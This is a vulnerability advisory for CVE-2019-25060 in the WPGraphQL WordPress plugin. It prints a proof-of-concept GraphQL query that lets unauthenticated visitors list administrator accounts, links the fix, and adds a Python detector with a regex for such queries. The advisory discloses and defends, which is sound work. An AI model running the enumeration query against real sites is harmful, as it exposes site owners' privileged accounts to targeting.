CVE-2019-25060: Improper Access Control in WPGraphQL Leaks WordPress Account Roles

Description

The WPGraphQL plugin (v < 0.3.5) does not properly restrict access to information about other users' roles on the affected WordPress site. Because of this, a remote, unauthenticated attacker can craft a GraphQL query that filters users by role and thereby retrieve the account roles of every user on the site. This has been assigned CVE-2019-25060.

Proof of Concept

  1. Make this GraphQL call as an unauthenticated user on any WordPress site using this plugin:

     ```graphql
     query getUsers{
         users(where:{role:ADMINISTRATOR}){
             edges{
                 node{
                     userId
                     name
                 }
             }
         }
     }
     ```

     The response will be:

     ```json
     {
       "data": {
         "users": {
           "edges": [
             {
               "node": {
                 "userId": 1,
                 "name": "root"
               }
             }
           ]
         }
       }
     }
     ```

     An unauthenticated user is therefore able to determine which users hold the administrator role on the WordPress site (and, by changing the `role` value, any other role). This issue has been fixed in https://github.com/wp-graphql/wp-graphql/pull/900.
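Detection logic for this issue, added here as an example (it is not code from the advisory or from WPGraphQL): it scans request records for the role-filtered `users` query shown above, coming from clients that are not logged in, which is the signature of this enumeration on an unpatched site. It assumes access records shaped as dicts with an `authenticated` flag and the raw POST body; the sample records are constructed.

```python
import json
import re
from typing import Dict, List

# Matches a `users(...)` selection whose `where` argument filters on `role`,
# the shape of the query in the advisory above. Whitespace is tolerated and
# the field names are matched case-insensitively; the enum value is free.
ROLE_FILTER = re.compile(
    r"users\s*\(\s*where\s*:\s*\{[^}]*\brole\s*:\s*[A-Z_]+",
    re.IGNORECASE,
)


def extract_query(body: str) -> str:
    """Return the GraphQL query text from a request body.

    WPGraphQL accepts a JSON object with a "query" key; a bare query string
    is passed through unchanged so GET-style log lines can be scanned too.
    """
    try:
        obj = json.loads(body)
    except ValueError:
        return body
    if isinstance(obj, dict) and isinstance(obj.get("query"), str):
        return obj["query"]
    return body


def flag_role_enumeration(records: List[Dict]) -> List[Dict]:
    """Return the records where an unauthenticated client filtered users by role."""
    flagged = []
    for rec in records:
        if rec.get("authenticated"):
            continue  # logged-in users may legitimately list users by role
        if ROLE_FILTER.search(extract_query(rec.get("body", ""))):
            flagged.append(rec)
    return flagged


# Constructed sample records (not real traffic); addresses are documentation ranges.
SAMPLE_RECORDS = [
    {"ip": "203.0.113.5", "authenticated": False,
     "body": json.dumps({"query": "query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }"})},
    {"ip": "203.0.113.6", "authenticated": False,
     "body": json.dumps({"query": "query { posts { nodes { title } } }"})},
    {"ip": "198.51.100.9", "authenticated": True,
     "body": json.dumps({"query": "query { users(where:{role:EDITOR}) { nodes { name } } }"})},
]

if __name__ == "__main__":
    for hit in flag_role_enumeration(SAMPLE_RECORDS):
        print(f"{hit['ip']}: unauthenticated role-filtered users query")
```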

This post is licensed under CC BY 4.0 by the author.